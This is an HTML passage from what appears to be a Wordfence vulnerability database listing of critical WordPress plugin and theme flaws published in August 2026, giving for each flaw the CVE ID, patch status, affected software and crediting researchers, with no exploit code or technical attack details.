<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18431" target="_blank" rel="noopener noreferrer">							CVE-2026-18431						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-builder" target="_blank" rel="noopener">Avada (Fusion) Builder</a> <span class="wfvr-software-slug">[fusion-builder]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/Avada" target="_blank" rel="noopener">Avada | Website Builder For WordPress &amp; WooCommerce</a> <span class="wfvr-software-slug">[Avada]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01c3929fe6b851d3cf7bda3c0215f691.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01c3929fe6b851d3cf7bda3c0215f691"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener">Alex Thomas</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5bef5bd3-8ec9-4a5b-bcdd-98952c7ef390" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/715723e7-5820-4a64-848f-f89b5b73a681" target="_blank" rel="noopener">Custom User Registration Fields for WooCommerce &lt;= 2.2.3 &#8211; Unauthenticated Privilege Escalation via &#8216;afreg_select_user_role&#8217; Parameter in Store API Checkout</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15369" target="_blank" rel="noopener noreferrer">							CVE-2026-15369						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration-plugin-for-woocommerce" target="_blank" rel="noopener">Custom User Registration Fields for WooCommerce</a> <span class="wfvr-software-slug">[user-registration-plugin-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2a1b4c1c638eb4f66b0677e71058a830.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2a1b4c1c638eb4f66b0677e71058a830"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener">0xd4rk5id3</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/715723e7-5820-4a64-848f-f89b5b73a681" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/30cc4552-bd12-4211-bd06-637352ceb5df" target="_blank" rel="noopener">Drag and Drop Multiple File Upload for Contact Form 7 &lt; 1.3.9.9 &#8211; Unauthenticated Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18781" target="_blank" rel="noopener noreferrer">							CVE-2026-18781						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/drag-and-drop-multiple-file-upload-contact-form-7" target="_blank" rel="noopener">Drag and Drop Multiple File Upload for Contact Form 7</a> <span class="wfvr-software-slug">[drag-and-drop-multiple-file-upload-contact-form-7]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/30cc4552-bd12-4211-bd06-637352ceb5df" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402" target="_blank" rel="noopener">ERP: Complete HR, Accounting &amp; CRM Suite Built for WooCommerce &lt;= 1.17.8 &#8211; Unauthenticated Arbitrary File Upload via CRM Email Connect IMAP Attachment</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18080" target="_blank" rel="noopener noreferrer">							CVE-2026-18080						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/erp" target="_blank" rel="noopener">ERP: Complete HR, Accounting &amp; CRM Suite Built for WooCommerce</a> <span class="wfvr-software-slug">[erp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/51ac16594069727fd09950dd36cda805.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51ac16594069727fd09950dd36cda805"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener">Talal Nasraddeen</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49c3be3f-60b3-4b83-9683-a08e8e1cf9e9" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform &lt;= 4.16.7.1 &#8211; Unauthenticated PHP Object Injection to Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82222" target="_blank" rel="noopener noreferrer">							CVE-2026-82222						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/udin-chan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0f9145553cefadc810683299145a6e4b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f9145553cefadc810683299145a6e4b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/udin-chan" target="_blank" rel="noopener">Udin Chan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49c3be3f-60b3-4b83-9683-a08e8e1cf9e9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60dacb8d-0de6-4755-8857-6b05083a23b8" target="_blank" rel="noopener">Hash Form – Drag &amp; Drop Form Builder &lt;= 1.4.2 &#8211; Unauthenticated Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81780" target="_blank" rel="noopener noreferrer">							CVE-2026-81780						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form" target="_blank" rel="noopener">Hash Form – Drag &amp; Drop Form Builder</a> <span class="wfvr-software-slug">[hash-form]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/coryroo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/960eb86bf3a5927188ecec51187f1ec1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="960eb86bf3a5927188ecec51187f1ec1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/coryroo" target="_blank" rel="noopener">CoryRoo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60dacb8d-0de6-4755-8857-6b05083a23b8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee755e25-5f70-4688-b08d-4a3f127d91d4" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer &lt; 6.2.1 &#8211; Unauthenticated Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16747" target="_blank" rel="noopener noreferrer">							CVE-2026-16747						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee755e25-5f70-4688-b08d-4a3f127d91d4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cd71719-e900-46c8-884e-b485c62fed00" target="_blank" rel="noopener">ManageWP Worker &lt; 4.9.37 &#8211; Authentication Bypass</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18052" target="_blank" rel="noopener noreferrer">							CVE-2026-18052						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/worker" target="_blank" rel="noopener">ManageWP Worker</a> <span class="wfvr-software-slug">[worker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cd71719-e900-46c8-884e-b485c62fed00" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c458e018-5901-4917-9847-35f07646e068" target="_blank" rel="noopener">MyHome Core &lt;= 4.4.5 &#8211; Authentication Bypass to Account Takeover via Activation Token</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15980" target="_blank" rel="noopener noreferrer">							CVE-2026-15980						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/myhome-core" target="_blank" rel="noopener">MyHome Core</a> <span class="wfvr-software-slug">[myhome-core]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c458e018-5901-4917-9847-35f07646e068" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb075839-5669-4a5a-b225-f7ea98672490" target="_blank" rel="noopener">Newspapers X 1.0.46 &#8211; 1.0.48 &#8211; Backdoor</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81779" target="_blank" rel="noopener noreferrer">							CVE-2026-81779						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/newspapers-x" target="_blank" rel="noopener">Newspapers X</a> <span class="wfvr-software-slug">[newspapers-x]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ashv4ni" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c51e057afcf1f4a61beefd37f423c06d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c51e057afcf1f4a61beefd37f423c06d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ashv4ni" target="_blank" rel="noopener">ashv4ni</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb075839-5669-4a5a-b225-f7ea98672490" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44d63454-87f0-49e3-ac04-2fa83882500d" target="_blank" rel="noopener">Sigma Forms Pro &lt;= 1.4.5 &#8211; Unauthenticated Unauthenticated Arbitrary File Upload Leading to Remote Code Execution via Pre-built Template File Upload Field</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14494" target="_blank" rel="noopener noreferrer">							CVE-2026-14494						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sigmaforms-pro" target="_blank" rel="noopener">SigmaForms Pro – AI Generated Forms</a> <span class="wfvr-software-slug">[sigmaforms-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dinh-van" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cfc16ede98e1f9d9949c6a2b6b70bc1c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cfc16ede98e1f9d9949c6a2b6b70bc1c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dinh-van" target="_blank" rel="noopener">d.v4n_s3c</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44d63454-87f0-49e3-ac04-2fa83882500d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a98b31a5-2aac-439f-a081-445dba4522e2" target="_blank" rel="noopener">SmilePass Selfie Login &lt;= 1.0.2 &#8211; Authentication Bypass to Administrator</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77002" target="_blank" rel="noopener noreferrer">							CVE-2026-77002						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/selfie-login" target="_blank" rel="noopener">SmilePass Selfie Login</a> <span class="wfvr-software-slug">[selfie-login]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dacc17a271a6378d63177b8dbe4c6a05.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dacc17a271a6378d63177b8dbe4c6a05"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi-2" target="_blank" rel="noopener">Khaled Alenazi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a98b31a5-2aac-439f-a081-445dba4522e2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6b8ba516-54f8-4422-846a-106b9e8bca8d" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery &lt; 3.9.8 &#8211; Authentication Bypass via Account Takeover</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15206" target="_blank" rel="noopener noreferrer">							CVE-2026-15206						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</a> <span class="wfvr-software-slug">[sms-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6b8ba516-54f8-4422-846a-106b9e8bca8d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01f287b6-1720-4ece-9141-f906835b8bae" target="_blank" rel="noopener">The WP Remote WordPress Plugin, Malcare Security, and BlogVault Backup &amp; Staging &lt; 6.65 &#8211; Unauthenticated Site Takeover via Brute Force</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19718" target="_blank" rel="noopener noreferrer">							CVE-2026-19718						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/blogvault-real-time-backup" target="_blank" rel="noopener">BlogVault Backup &amp; Staging</a> <span class="wfvr-software-slug">[blogvault-real-time-backup]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/malcare-security" target="_blank" rel="noopener">MalCare WordPress Security Plugin – Malware Scanner, Cleaner, Security Firewall</a> <span class="wfvr-software-slug">[malcare-security]</span></div>
